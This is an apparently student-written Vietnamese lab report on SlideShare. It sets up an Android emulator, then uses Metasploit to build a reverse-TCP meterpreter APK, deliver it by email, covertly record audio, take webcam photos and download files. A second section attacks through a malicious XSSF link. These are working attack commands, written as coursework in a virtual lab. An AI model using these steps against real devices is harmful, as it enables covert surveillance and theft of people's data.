SlideShare a Scribd company logo
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
BÁO CÁO ĐỀ TÀI THỰC TẬP 
ĐỀ TÀI: 
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH 
CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN 
THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. 
GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG 
SINH VIÊN THỰC HIỆN: NGUYỄN XUÂN NGỌC 
BÁO CÁO TUẦN 3-4 
(14/08/2014 – 28/08/2014) 
Trang 1
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 2 
Nội dung: 
I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ 
VIRTUALBOX 
 Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy 
android (có thể là smartphone, tablet…). 
 Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào 
thiết bị chạy android. 
1. Các Tools cần thi ết để cài đặt: 
- Phần mềm Virtual Box. 
- Phần mềm Genymotion. 
- Bộ công cụ phát triển Java SE Development Kit. 
- Bộ công cụ Android SDK Manager. 
2. Tải và cài đặt JDK – Java SE Development Kit: 
Bước 1: Tải JDK tại 
http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 
1880260.html 
Click chọn “Accept License Agreement” 
Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa 
chọn Next. Cuối cùng click Close 
Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe 
Trang 3 
Gõ lệnh “java <Enter>”.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
3. Tải về và cài đặt Android SDK Manager: 
Bước 1: Tải về tại link http://developer.android.com/sdk/index.html 
Click vào I have read and agree… và chọn phiên bản 64-bit 
Click Download 
Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe 
Lưu ý là có thể gặp lỗi Fetching https://dl -sll ... Failed to fetch… Close 
Trang 4 
thông báo này lại. 
Xuất hiển cửa sổ Choose Packages to Install . Nếu cửa sổ này rỗng > 
Cancel 
Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô 
Force https://... 
Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager 
Ta chọn các Packages muốn cài. Và Install
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > 
Trang 5 
Install > Chờ hoàn tất.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
4. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox: 
Ta có thể bản VirtualBox phù hợp với máy của bạn. 
- Bước 1: Ta tải về file cài đặt VirtualBox tại trang: 
http://www.oracle.com/technetwork/server-storage/ 
virtualbox/downloads/index.html 
Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác: 
Bước 3: Next > Next > Next > Install > Finish 
Trang 6
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 4: Giao diện phần mềm sau khi cài đặt xong. 
5. Tải về và cài đặt ứng dụng Genymotion: 
Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com 
Ta có thể đăng ký miễn phí và tải Genymotion về máy. 
Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > 
OK > Next 
Bước 3: Chọn thư mục lưu cài đặt. 
Trang 7
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 4: Next > Next > Install > Finish 
Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục 
Settings 
Trang 8
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web 
www.genymotion.com ở thẻ General 
Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường 
dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó 
lưu lại cài đặt. 
F: Softadt-bundle-windows-x86_64-20140702sdk 
Trang 9
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
6. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox: 
Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add 
Bước 2: Chọn tên thiết bị mà muốn làm máy ảo. 
Xuất hiện cấu hình máy ảo sắp tạo: 
Trang 
10
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo. 
Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play 
Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công. 
Trang 
11
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
12
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
II – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ 
ANDROID: 
Trang 
13 
1. Các công cụ cần thi ết: 
Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị: 
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng 
VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). 
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo 
tablet chạy Android 4.3. 
- Cả 2 thiết bị đều có thể kết nối mạng. 
- Có tài khoản email để gửi và nhận file trên cả 2 thiết bị. 
2. Tiến trình: 
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. 
Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được 
internet. 
Vào Edit > Virtual Network Editor… 
Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở 
ô Bridged to.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig” 
Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng 
dụng *.apk và gửi qua email. 
Trang 
14
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa 
chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên 
file>” 
Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 
lport=8080 R > /root/Desktop/appsX.apk. 
- Tạo ứng dụng ReverseTCP có trên file là appsX.apk. 
- Địa chỉ IP máy tấn công là 192.168.149.136. 
- Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023). 
- Lưu file tại Desktop. 
Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: 
“msfconsole” 
Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh: 
“set payload android/meterpreter/reverse_tcp” 
“set lhost 192.168.149.136” 
“set lport 8080” 
Trang 
15
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công. 
Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng 
dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP. 
Trang 
16
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân. 
Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được. 
Trang 
17
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
18 
3. Khai thác thông tin hê thống: 
Xem thông tin hệ thống bằng lệnh “sysinfo”. 
4. Ghi âm lén: 
Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh 
“record_mic”. 
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali . 
5. Khai thác webcam và chụp ảnh lén: 
Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh 
lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã 
webcam>”.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali . 
6. Khai thác file hệ thống của máy nạn nhân: 
Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”. 
Trang 
19
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
20 
7. Khai thác dữ liệu từ SDCARD: 
Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. 
Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. 
Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd 
Download” và lệnh liệt kê “ls”. 
Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. 
Ở đây dùng lệnh “download appsX.apk”. 
Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn 
công Kali. 
8. Kết thúc tấn công: 
Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
III – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA 
MÃ ĐỘC: 
Trang 
21 
1. Các công cụ cần thi ết: 
Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần 
chuẩn bị như tấn công bằng file mã độc ở trên: 
- Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng 
VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). 
- Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo 
tablet chạy Android 4.3. 
- Cả 2 thiết bị đều có thể kết nối mạng. 
- Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị. 
2. Tiến trình: 
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. 
Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật 
Framework 
“msfupdate” 
“cd /opt/metasploit/apps/pro/msf3” 
“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” 
Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true 
Trang 
22 
Mode=Verbose” 
Bước 5: Thực hiện lệnh “xssf_urls” 
Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test 
page, XSSF logs page…
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: 
Trang 
23 
http://192.168.149.136:80/xssf/test.html 
Ta nhận được thông báo trên máy tấn công Kali: 
3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: 
Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường 
dẫn mã độc http://192.168.149.136:80/xssf/test.html 
4. Xem thông tin về nạn nhân đang truy cập: 
Dùng lệnh “xssf_information <ID máy nạn nhân>” 
Ở đây ví dụ là “xssf_information 1”
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
5. Khai thác dữ liệu từ máy nạn nhân: 
 Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có 
Trang 
24 
thể thao tác lên máy nạn nhân 
 Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: 
“use auxiliary/xssf/public/misc/alert” 
“run”
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Ở máy nạn nhân sẽ nhận được cảnh báo XSSF 
Thoát ra msf bằng lệnh “Ctrl+C” > “back” 
 Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không 
bằng lệnh: 
“use auxiliary/xssf/public/misc/visited_pages” 
“run” 
 Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: 
“use auxiliary/gather/android_htmlfileprovider” 
“set SRVPORT 87” 
“set URIPATH /” 
“run” 
Trang 
25
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ 
Ta nhận được thông tin máy nạn nhân: 
6. Thoát khỏi XSSF của Metasploit: 
Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit” 
Trang 
26
GVHD : VÕ ĐỖ THẮNG 
August 28, 2014 
Trang 
27 
IV – NGUỒN THAM KHẢO 
http://www.oracle.com/technetwork/server-storage/ 
virtualbox/downloads/index.html 
http://www.genymotion.com/ 
http://developer.android.com/sdk/index.html#download 
http://www.oracle.com/technetwork/java/javase/downloads 
http://www.whitehat.vn/threads/ 
Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – 
www.Athena.Edu.Vn

More Related Content

What's hot

Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảothach28
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
Lê Lãnh
 
118 câu hỏi lý thuyết_bvp
118 câu hỏi lý thuyết_bvp118 câu hỏi lý thuyết_bvp
118 câu hỏi lý thuyết_bvp
ttthanhha211
 
Kali linux
Kali linuxKali linux
Kali linux
Tân Trần
 
Firefox
FirefoxFirefox
Firefox
Chi Lê Yến
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
kakawpah0911
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...Nguyen Anh
 
Ky thuat hack
Ky thuat hackKy thuat hack
Ky thuat hack
ketban0702
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
Vương Nguyễn
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )Trọng An
 
Scan virus
Scan virusScan virus
Scan virus
quyennguyenvuong1
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareNguyen Stone
 
Bao cao athena 2
Bao cao athena 2Bao cao athena 2
Bao cao athena 2
NhoxPO
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
phanconghien
 

What's hot (17)

Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 
118 câu hỏi lý thuyết_bvp
118 câu hỏi lý thuyết_bvp118 câu hỏi lý thuyết_bvp
118 câu hỏi lý thuyết_bvp
 
Kali linux
Kali linuxKali linux
Kali linux
 
Firefox
FirefoxFirefox
Firefox
 
BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6BÁO CÁO THỰC TẬP - TUẦN 6
BÁO CÁO THỰC TẬP - TUẦN 6
 
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...Nghiên cứu các chương trình có mã độc trên android  và nghiên cứu cài đặt bac...
Nghiên cứu các chương trình có mã độc trên android và nghiên cứu cài đặt bac...
 
Ky thuat hack
Ky thuat hackKy thuat hack
Ky thuat hack
 
K37.103.529 gioi thieu ve firefox
K37.103.529 gioi thieu ve firefoxK37.103.529 gioi thieu ve firefox
K37.103.529 gioi thieu ve firefox
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Scan virus
Scan virusScan virus
Scan virus
 
Genmymotion
GenmymotionGenmymotion
Genmymotion
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Flixel tutorial
Flixel tutorialFlixel tutorial
Flixel tutorial
 
Bao cao athena 2
Bao cao athena 2Bao cao athena 2
Bao cao athena 2
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
BÁO CÁO THỰC TẬP ATHENA - TUẦN 1
 

Viewers also liked

Glosario
GlosarioGlosario
Glosario
Juan Pablo CR
 
Airkix interview questions and answers
Airkix interview questions and answersAirkix interview questions and answers
Airkix interview questions and answers
victoriamartin968
 
The Downfall of Myspace
The Downfall of MyspaceThe Downfall of Myspace
The Downfall of Myspace
Penji
 
What is Inspection Company?
What is Inspection Company?What is Inspection Company?
What is Inspection Company?
rosenq
 
students
studentsstudents
students
9236819061
 
Glosario
GlosarioGlosario
Glosario
Juan Pablo CR
 
NST Application Booklet round 3
NST Application Booklet round 3NST Application Booklet round 3
NST Application Booklet round 3
Kate Crow
 
Hong Kong’s Cuisine - Snake Soup
Hong Kong’s Cuisine - Snake Soup Hong Kong’s Cuisine - Snake Soup
Hong Kong’s Cuisine - Snake Soup
Luisa De Roo
 

Viewers also liked (8)

Glosario
GlosarioGlosario
Glosario
 
Airkix interview questions and answers
Airkix interview questions and answersAirkix interview questions and answers
Airkix interview questions and answers
 
The Downfall of Myspace
The Downfall of MyspaceThe Downfall of Myspace
The Downfall of Myspace
 
What is Inspection Company?
What is Inspection Company?What is Inspection Company?
What is Inspection Company?
 
students
studentsstudents
students
 
Glosario
GlosarioGlosario
Glosario
 
NST Application Booklet round 3
NST Application Booklet round 3NST Application Booklet round 3
NST Application Booklet round 3
 
Hong Kong’s Cuisine - Snake Soup
Hong Kong’s Cuisine - Snake Soup Hong Kong’s Cuisine - Snake Soup
Hong Kong’s Cuisine - Snake Soup
 

Similar to ATHENA - Nguyen Xuan Ngoc - Tuan 3,4

BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
kakawpah0911
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
kakawpah0911
 
1
11
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
Chuc Thanh
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt GenmymotionTrọng An
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
phanconghien
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
Hữu Mỹ Lê Phan
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
phanconghien
 
Tuan5
Tuan5Tuan5
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
Phuong Ngo
 
tao ma doc tren kalilinux
tao ma doc tren kalilinuxtao ma doc tren kalilinux
tao ma doc tren kalilinux
Võ Thành Đạt
 
Bao cao tuan 5
Bao cao tuan 5Bao cao tuan 5
Bao cao tuan 5
Seavar Neuvell
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
PhamTruongGiang4
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
Chuc Thanh
 

Similar to ATHENA - Nguyen Xuan Ngoc - Tuan 3,4 (20)

BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5BÁO CÁO THỰC TẬP - TUẦN 5
BÁO CÁO THỰC TẬP - TUẦN 5
 
1
11
1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Cài đặt Genmymotion
 Cài đặt Genmymotion Cài đặt Genmymotion
Cài đặt Genmymotion
 
Vps
VpsVps
Vps
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
BÁO CÁO THỰC TẬP ATHENA - TUẦN 5
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
Athena tuần 5
Athena tuần 5Athena tuần 5
Athena tuần 5
 
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
BÁO CÁO THỰC TẬP ATHENA - TUẦN 6
 
Tuan5
Tuan5Tuan5
Tuan5
 
Bao cao tuan 6 7 8
Bao cao tuan 6 7 8Bao cao tuan 6 7 8
Bao cao tuan 6 7 8
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
tao ma doc tren kalilinux
tao ma doc tren kalilinuxtao ma doc tren kalilinux
tao ma doc tren kalilinux
 
Bao cao tuan 5
Bao cao tuan 5Bao cao tuan 5
Bao cao tuan 5
 
INT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdfINT1484-Bai-thuc-hanh-01.pdf
INT1484-Bai-thuc-hanh-01.pdf
 
Bao cao vps
Bao cao vpsBao cao vps
Bao cao vps
 

ATHENA - Nguyen Xuan Ngoc - Tuan 3,4

  • 1. GVHD : VÕ ĐỖ THẮNG August 28, 2014 BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. GIÁO VIÊN HƯỚNG DẪN: VÕ ĐỖ THẮNG SINH VIÊN THỰC HIỆN: NGUYỄN XUÂN NGỌC BÁO CÁO TUẦN 3-4 (14/08/2014 – 28/08/2014) Trang 1
  • 2. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 2 Nội dung: I - MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION VÀ VIRTUALBOX  Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…).  Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android. 1. Các Tools cần thi ết để cài đặt: - Phần mềm Virtual Box. - Phần mềm Genymotion. - Bộ công cụ phát triển Java SE Development Kit. - Bộ công cụ Android SDK Manager. 2. Tải và cài đặt JDK – Java SE Development Kit: Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html Click chọn “Accept License Agreement” Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
  • 3. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next. Cuối cùng click Close Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe Trang 3 Gõ lệnh “java <Enter>”.
  • 4. GVHD : VÕ ĐỖ THẮNG August 28, 2014 3. Tải về và cài đặt Android SDK Manager: Bước 1: Tải về tại link http://developer.android.com/sdk/index.html Click vào I have read and agree… và chọn phiên bản 64-bit Click Download Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe Lưu ý là có thể gặp lỗi Fetching https://dl -sll ... Failed to fetch… Close Trang 4 thông báo này lại. Xuất hiển cửa sổ Choose Packages to Install . Nếu cửa sổ này rỗng > Cancel Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force https://... Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager Ta chọn các Packages muốn cài. Và Install
  • 5. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > Trang 5 Install > Chờ hoàn tất.
  • 6. GVHD : VÕ ĐỖ THẮNG August 28, 2014 4. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox: Ta có thể bản VirtualBox phù hợp với máy của bạn. - Bước 1: Ta tải về file cài đặt VirtualBox tại trang: http://www.oracle.com/technetwork/server-storage/ virtualbox/downloads/index.html Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác: Bước 3: Next > Next > Next > Install > Finish Trang 6
  • 7. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 4: Giao diện phần mềm sau khi cài đặt xong. 5. Tải về và cài đặt ứng dụng Genymotion: Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com Ta có thể đăng ký miễn phí và tải Genymotion về máy. Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > OK > Next Bước 3: Chọn thư mục lưu cài đặt. Trang 7
  • 8. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 4: Next > Next > Install > Finish Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục Settings Trang 8
  • 9. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web www.genymotion.com ở thẻ General Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó lưu lại cài đặt. F: Softadt-bundle-windows-x86_64-20140702sdk Trang 9
  • 10. GVHD : VÕ ĐỖ THẮNG August 28, 2014 6. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox: Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add Bước 2: Chọn tên thiết bị mà muốn làm máy ảo. Xuất hiện cấu hình máy ảo sắp tạo: Trang 10
  • 11. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo. Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công. Trang 11
  • 12. GVHD : VÕ ĐỖ THẮNG August 28, 2014 Trang 12
